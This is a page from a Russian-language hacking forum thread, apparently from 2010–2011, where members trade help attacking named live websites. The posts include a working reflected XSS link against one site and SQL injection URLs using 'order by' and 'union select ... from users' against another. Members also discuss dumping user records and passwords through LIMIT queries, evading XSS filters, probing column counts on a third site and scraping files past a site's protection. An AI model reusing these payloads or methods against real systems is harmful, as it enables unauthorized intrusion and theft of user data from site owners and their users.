Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. valyka80

    valyka80 Banned

    Joined:
    14 Jun 2010
    Messages:
    163
    Likes Received:
    20
    Reputations:
    16
    Выше топик
    http://forum.antichat.ru/threadnav46016-1611-10.html
     
  2. ~d0s~

    ~d0s~ Banned

    Joined:
    17 Apr 2010
    Messages:
    246
    Likes Received:
    257
    Reputations:
    154
    Смотря что нужно?Ковычки там слешатся.Вот хсс отакэ можно http://www.mirdoors.ru/login.php?link="><script>alert('собери портфель на завтро')</script>

    Незнаю как ты там делал,но запрос с выводом проходит,правда это не поможет=\
     
    1 person likes this.
  3. .while

    .while Member

    Joined:
    22 Feb 2010
    Messages:
    40
    Likes Received:
    5
    Reputations:
    0
    Доброго времени суток.Посоветуйте хороший sql инжектор, помимо хавия и sqlhelper.Спасибо.)
     
  4. valyka80

    valyka80 Banned

    Joined:
    14 Jun 2010
    Messages:
    163
    Likes Received:
    20
    Reputations:
    16
    Да все у меня получилось пароли абра-када-бра.
     
  5. Gorev

    Gorev Level 8

    Joined:
    31 Mar 2006
    Messages:
    2,551
    Likes Received:
    1,259
    Reputations:
    274
    ну смотри, я думаю там пассы в откытом виде а не хеши..так как есть одна запись с цифровым пассом faran:123 , думаю что пассы просто арабской вязью написанны..и таким образом они выводится правильно не будут, сервак на винде .... честно сказать я не знаю что делать
     
  6. valyka80

    valyka80 Banned

    Joined:
    14 Jun 2010
    Messages:
    163
    Likes Received:
    20
    Reputations:
    16
    В двух пасах двоеточие стоит

    ѼЕ*?ВЁ1½îî:FВђВ°вЂ*Вё2¥›ÞìgæXgГ†q
    типа соль у них же с права на лево пишеться

    ну не ставить же арабский языковый пакет
     
    #15886 valyka80, 13 Jan 2011
    Last edited: 13 Jan 2011
  7. artygrand

    artygrand New Member

    Joined:
    13 Jan 2011
    Messages:
    2
    Likes Received:
    0
    Reputations:
    0
    привет всем!
    У меня вполне безобидная просьба

    есть сайт - fansubs.ru
    я с него хочу слить все файлы субтитров
    вроде бы все там очевидно, нужно только по ссылкам вида fansubs.ru/base.php?srt=1 пройтись, но у них какая то защита теперь стоит и только при передаче данных из формы загрузка начинается.
    причем, если отправлять форму с помощью жабаскрипта в цикле, то тоже выдается страничка, а не файл.

    есть какие нибудь идеи по этому?
     
  8. fl00der

    fl00der Moderator

    Joined:
    17 Dec 2008
    Messages:
    1,026
    Likes Received:
    311
    Reputations:
    86
    М.б. попробывать поиграться с кодировкой?
    Лучший инжектор- собственные руки.
    Из автоматических- SQLi Helper.
     
    _________________________
    #15888 fl00der, 14 Jan 2011
    Last edited: 14 Jan 2011
    1 person likes this.
  9. Seravin

    Seravin Active Member

    Joined:
    25 Nov 2009
    Messages:
    475
    Likes Received:
    190
    Reputations:
    221
    мб всё таки тулза лучше чем sql helper?
     
  10. fl00der

    fl00der Moderator

    Joined:
    17 Dec 2008
    Messages:
    1,026
    Likes Received:
    311
    Reputations:
    86
    Да да да, про нее забыл опять.
     
    _________________________
  11. AnGeI

    AnGeI Elder - Старейшина

    Joined:
    8 Dec 2008
    Messages:
    395
    Likes Received:
    79
    Reputations:
    16
    В скрипте не отображается левая скобка "<" и текст, который идет после него.
    Если же использовать правую скобку ">", она заменяется на &gt; и текст который идет после неё отображается нормально.
    Других фильтров не заметил.
    Как выполнить js код?
     
  12. PvgValo

    PvgValo Active Member

    Joined:
    1 Aug 2009
    Messages:
    548
    Likes Received:
    160
    Reputations:
    57
    AnGeI, попробуй вместо < писать %3c, вместо > %3e
     
  13. rootmd

    rootmd New Member

    Joined:
    9 Dec 2010
    Messages:
    101
    Likes Received:
    3
    Reputations:
    -5
  14. AnGeI

    AnGeI Elder - Старейшина

    Joined:
    8 Dec 2008
    Messages:
    395
    Likes Received:
    79
    Reputations:
    16
    Не выполняется, выводится:
    Code:
    %3cscript%3ealert(1);%3c/script%3e
     
  15. durito

    durito Elder - Старейшина

    Joined:
    6 Jun 2008
    Messages:
    125
    Likes Received:
    24
    Reputations:
    27
    а вот если организовать дампинг инфы через лимит, то на запросах limit+1000,1 сервак уходит в даун :)

    попробую ка я вывод через user_id
     
  16. Seravin

    Seravin Active Member

    Joined:
    25 Nov 2009
    Messages:
    475
    Likes Received:
    190
    Reputations:
    221
    он не уходит в даун, браузер в header менять надо, он типа банит или что. А типа банит после того как ты обращаешься к строке которой несуществует. предпологаю что 1000 строки просто нет
     
  17. mayak

    mayak New Member

    Joined:
    10 Nov 2009
    Messages:
    3
    Likes Received:
    0
    Reputations:
    0
    /////
    https://forum.antichat.net/threadedpost2518327.html
     
    #15897 mayak, 17 Jan 2011
    Last edited by a moderator: 18 Jan 2011
  18. Lastman

    Lastman New Member

    Joined:
    12 Dec 2010
    Messages:
    51
    Likes Received:
    0
    Reputations:
    0
    Помогите подобрать количество полей
    bratsk.org/news.html?page=-1
     
  19. Фараон

    Фараон коКотэ Of Antichat

    Joined:
    7 Nov 2010
    Messages:
    153
    Likes Received:
    105
    Reputations:
    83
    Нет там ничего..
     
  20. silverboy440

    silverboy440 New Member

    Joined:
    19 Nov 2008
    Messages:
    4
    Likes Received:
    0
    Reputations:
    0
    http://oldtitan.ja.org/challenge.php?page=rules&id=1'+order+by+47+--+

    http://oldtitan.ja.org/challenge.php?page=rules&id=1'+union+all+select+null,null,null,null,null,nu ll,null,null,null,null,null,null,null,null,null,nu ll,null,null,null,null,null,null,null,null,null,nu ll,null,null,null,null,null,null,null,null,null,nu ll,null,null,null,null,null,null,null,null,null,nu ll,null+from+users+--+

    не получается для

    http://oldtitan.ja.org/area_admin.php?=id3

    плз хэлп, возможно ли что нить сделать?
     
Thread Status:
Not open for further replies.